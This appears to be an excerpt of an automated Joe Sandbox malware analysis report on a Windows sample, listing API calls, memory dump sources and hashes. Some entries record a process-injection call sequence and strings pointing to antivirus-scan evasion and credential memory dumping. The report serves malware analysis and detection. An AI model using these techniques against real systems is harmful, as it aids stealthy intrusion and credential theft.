                                                              • Instruction Fuzzy Hash: FFF0B4B2B41795ABDB20AF5E9C81782BBA4FB00354F054579F98CAB340D7B0A811CFD4
                                                              APIs
                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02B81FE4), ref: 02B81704
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeVirtual
                                                              • String ID:
                                                              • API String ID: 1263568516-0
                                                              • Opcode ID: 61aa7f50624fcea4168b25860724eff9e2ba59ef9e2f2416c619c1348532b689
                                                              • Instruction ID: 2bad6eab8ab04fbb28b43f7469c63964cf9dcbdac5cb67d275f366816ee9fc15
                                                              • Opcode Fuzzy Hash: 61aa7f50624fcea4168b25860724eff9e2ba59ef9e2f2416c619c1348532b689
                                                              • Instruction Fuzzy Hash: 10E086B9311301AFD7106E7D5D407126BD8EB44654F1448B9F54DDB241D2A0E811CB60
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B9ABE3,?,?,02B9AC75,00000000,02B9AD51), ref: 02B9A970
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B9A988
• GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B9A99A
• GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B9A9AC
• GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B9A9BE
• GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B9A9D0
• GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B9A9E2
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B9A9F4
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B9AA06
• GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B9AA18
• GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B9AA2A
• GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B9AA3C
• GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B9AA4E
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B9AA60
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B9AA72
• GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B9AA84
• GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B9AA96
Strings
Memory Dump Source
• Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
• Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
• API String ID: 667068680-597814768
• Opcode ID: de2aba2e45c38df419d8a24648db3b871e21f8a7cb4126cbddd14bc8901dfca5
• Instruction ID: fa2d7c08963535ea822810031a1ae9833ec43e1218a9759bc82fe18609e8881a
• Opcode Fuzzy Hash: de2aba2e45c38df419d8a24648db3b871e21f8a7cb4126cbddd14bc8901dfca5
• Instruction Fuzzy Hash: 69318FB0A90760EFEF10AFB8D885A6A37EAEB06740B5009F5F40ADF215D7749850CF51
APIs
  • Part of subcall function 02B98824: LoadLibraryA.KERNEL32(00000000,00000000,02B9890B), ref: 02B98858
  • Part of subcall function 02B98824: FreeLibrary.KERNEL32(74FC0000,00000000,02BE1388,Function_000065D8,00000004,02BE1398,02BE1388,05F5E0FF,00000040,02BE139C,74FC0000,00000000,00000000,00000000,00000000,02B9890B), ref: 02B988EB
• GetThreadContext.KERNEL32(00000000,02BE1420,ScanString,02BE13A4,02B9A77C,UacInitialize,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,UacInitialize,02BE13A4), ref: 02B99442
  • Part of subcall function 02B979B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B97A27
  • Part of subcall function 02B97D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B97D74
• SetThreadContext.KERNEL32(00000000,02BE1420,ScanBuffer,02BE13A4,02B9A77C,ScanString,02BE13A4,02B9A77C,Initialize,02BE13A4,02B9A77C,00000000,-00000008,02BE14F8,00000004,02BE14FC), ref: 02B9A157
• NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02BE1420,ScanBuffer,02BE13A4,02B9A77C,ScanString,02BE13A4,02B9A77C,Initialize,02BE13A4,02B9A77C,00000000,-00000008,02BE14F8), ref: 02B9A164
  • Part of subcall function 02B987A0: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize,02BE13A4,02B9A77C,UacScan), ref: 02B987B4
  • Part of subcall function 02B987A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B987CE
  • Part of subcall function 02B987A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize), ref: 02B9880A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
• Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
Yara matches
Similarity
• API ID: Library$Thread$ContextFreeLoadMemoryVirtual$AddressAllocateProcResumeWrite
• String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
• API String ID: 4180202596-51457883
• Opcode ID: 3bc68f6e76866b446f4c02e97da6e817cf4926bdf85da57035bc258e7a0cabbc
• Instruction ID: e56dc092587a7425e98617c74bdd4ca2b52ea06b1914e488ed30daccc74e0ae1
• Opcode Fuzzy Hash: 3bc68f6e76866b446f4c02e97da6e817cf4926bdf85da57035bc258e7a0cabbc
• Instruction Fuzzy Hash: 7AE2E635A5011A9FDF11FBA4DC91ADE73BAAF89310F1084F1E109AB224DE35AE46CF51
APIs
  • Part of subcall function 02B98824: LoadLibraryA.KERNEL32(00000000,00000000,02B9890B), ref: 02B98858
  • Part of subcall function 02B98824: FreeLibrary.KERNEL32(74FC0000,00000000,02BE1388,Function_000065D8,00000004,02BE1398,02BE1388,05F5E0FF,00000040,02BE139C,74FC0000,00000000,00000000,00000000,00000000,02B9890B), ref: 02B988EB
• GetThreadContext.KERNEL32(00000000,02BE1420,ScanString,02BE13A4,02B9A77C,UacInitialize,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,UacInitialize,02BE13A4), ref: 02B99442
  • Part of subcall function 02B979B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B97A27
Strings
Memory Dump Source
• Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
• Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
Yara matches
Similarity
• API ID: Library$AllocateContextFreeLoadMemoryThreadVirtual
• String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
• API String ID: 4236972194-51457883
• Opcode ID: b0a8ff2def0f5cd7491d10d4cf3180583b3961197b79c58d1cb7e747443585bb
• Instruction ID: a0c72d54ce5fbdb53d6ce4596711ce11cad0a18ee8b1695d1722386a183ce621
• Opcode Fuzzy Hash: b0a8ff2def0f5cd7491d10d4cf3180583b3961197b79c58d1cb7e747443585bb
• Instruction Fuzzy Hash: 22E2D635A5011A9FDF11FBA4DC91ADE73BAAF89310F1084F1E109AB224DE35AE46CF51
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B858D1
• GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02B858E8
• lstrcpynA.KERNEL32(?,?,?), ref: 02B85918
• lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B8597C
• lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B859B2
• FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B859C5
• FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B859D7
• lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B859E3
• lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B87338,02B80000), ref: 02B85A17
• lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B87338), ref: 02B85A23
• lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02B85A45
Strings
Memory Dump Source
• Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
• Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
Yara matches
Similarity
• API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
• String ID: GetLongPathNameA$\$kernel32.dll
• API String ID: 3245196872-1565342463
• Opcode ID: 4573de47a3e10493b49ca72d7b493c51fd3a6bb6065726c6ffed4226b08a52d5
• Instruction ID: 78037737497b0d3f00325eaeac12c48656ba8a9215c633ecf892bccdd2660811
• Opcode Fuzzy Hash: 4573de47a3e10493b49ca72d7b493c51fd3a6bb6065726c6ffed4226b08a52d5
• Instruction Fuzzy Hash: FA415C71D00259AFDB20EAE8CCC8AEEB3ADEB08310F4545E5A15CE7241E770AA45CF54
APIs
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B85B94
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B85BA1
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B85BA7
• lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B85BD2
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B85C19
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B85C29
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B85C51
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B85C61
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B85C87
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B85C97
Strings
Memory Dump Source
• Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
• Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
Yara matches
Similarity
• API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
• API String ID: 1599918012-2375825460
• Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
• Instruction ID: 2cdaac62cca5567b1c7c5ac2aff5a96723207d703ffdc93bfd39531b8683dc98
• Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
• Instruction Fuzzy Hash: 21318471E4021C2AEB35EEB89C85FEF77AD9B04380F4501E1964CE6181DB749E84CF91
Memory Dump Source
• Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
• Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ee65118e21ad850d673eeb422f47b08f07919d3d7449f3c795c8270207e56b85
• Instruction ID: b8b9acfb9abd3026bcd2ad8cb497bd4f13285487a1d6fb774b9ce099c53aa44c
• Opcode Fuzzy Hash: ee65118e21ad850d673eeb422f47b08f07919d3d7449f3c795c8270207e56b85
• Instruction Fuzzy Hash: 41020D71E001299BDF28CFA9C8807AEF7F1EF88314F154169D915E7384DB31AA45CB90
APIs
Memory Dump Source
• Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
• Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
Yara matches
Similarity
• API ID: __floor_pentium4
• String ID:
• API String ID: 4168288129-0
• Opcode ID: 574624ca80bd3090ad8ffd14a1ba33031806d4e91f5e8e29c299907347f52519
• Instruction ID: 5ba39a8ab09f7e4757c38f118a450af8577e12450aa4c23a2f397335d30ad914
• Opcode Fuzzy Hash: 574624ca80bd3090ad8ffd14a1ba33031806d4e91f5e8e29c299907347f52519
• Instruction Fuzzy Hash: 4FC24B71E086688FDB26CE28DD407E9B7B5EB84305F1449EAD84DE7240E775AE818F81
Strings
Memory Dump Source
• Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
• Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: a0300bf0e74490e07b48137b646e8018063fd0ad9baab8b1153cdb7e3f9059d1
• Instruction ID: fa8f0d6572c74e849a51fc25bbaae835b8a18a7ae9050600e2e2dd25ec7b5bf9
• Opcode Fuzzy Hash: a0300bf0e74490e07b48137b646e8018063fd0ad9baab8b1153cdb7e3f9059d1
• Instruction Fuzzy Hash: 04126D366083158BD704DF75C892A1EB3E2BFC8714F15896DE899AB380DB74E8059F83
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: xC
                                                              • API String ID: 0-2612284313
                                                              • Opcode ID: d458ade9fa3e430e56a490dc559ca3233c0ac936792f1b09f2272965098b9e79
                                                              • Instruction ID: d520aae8929b2d216974b20dfe282f8a3cb0a740583ea25d029f5fab448067fb
                                                              • Opcode Fuzzy Hash: d458ade9fa3e430e56a490dc559ca3233c0ac936792f1b09f2272965098b9e79
                                                              • Instruction Fuzzy Hash: ED0292716146528FC758CF2EE88063AB7E1EB8E306B45853EE495C7781EB34E931CB94
                                                              APIs
                                                              • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02B87F7D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DiskFreeSpace
                                                              • String ID:
                                                              • API String ID: 1705453755-0
                                                              • Opcode ID: 60a0a3317bc6745db68fd0609a05e035b6386226a90ab679635ab5dbfaeb8164
                                                              • Instruction ID: b1f63745ac3f3c722d64e7c101b13e3215ace84cf0114bf9c2738571bfccfa55
                                                              • Opcode Fuzzy Hash: 60a0a3317bc6745db68fd0609a05e035b6386226a90ab679635ab5dbfaeb8164
                                                              • Instruction Fuzzy Hash: 7C11C0B5A00209AFDB04DF99CD819EFF7F9EFC8704B14C569A509EB254E6719A01CB90
                                                              APIs
                                                              • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B8A76A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID:
                                                              • API String ID: 2299586839-0
                                                              • Opcode ID: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                                                              • Instruction ID: 0d2da3e715386df9dc3f847760234b00ef292f80ff2195287f8744c0f78bb985
                                                              • Opcode Fuzzy Hash: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                                                              • Instruction Fuzzy Hash: B2E0923570021417D311B5585C80AEAB3AD9758310F0041AAA90CC7341FEA09D408AE8
                                                              APIs
                                                              • GetVersionExA.KERNEL32(?,02BAC106,00000000,02BAC11E), ref: 02B8B722
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Version
                                                              • String ID:
                                                              • API String ID: 1889659487-0
                                                              • Opcode ID: b55ecf5c71a4d3b20c721b975d93d8133e4585ecbfce8983f5b675dc26f2bdc8
                                                              • Instruction ID: 6ed1f1a30976d67122a7252295a0808533abcfdbd2e49e9b1844f7d1f51d011c
                                                              • Opcode Fuzzy Hash: b55ecf5c71a4d3b20c721b975d93d8133e4585ecbfce8983f5b675dc26f2bdc8
                                                              • Instruction Fuzzy Hash: 8EF0D4789443029FD358EF28D542A2977E5FB49B94F8089A9E898C7780E734D824CF52
                                                              APIs
                                                              • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02B8BDFA,00000000,02B8C013,?,?,00000000,00000000), ref: 02B8A7AB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
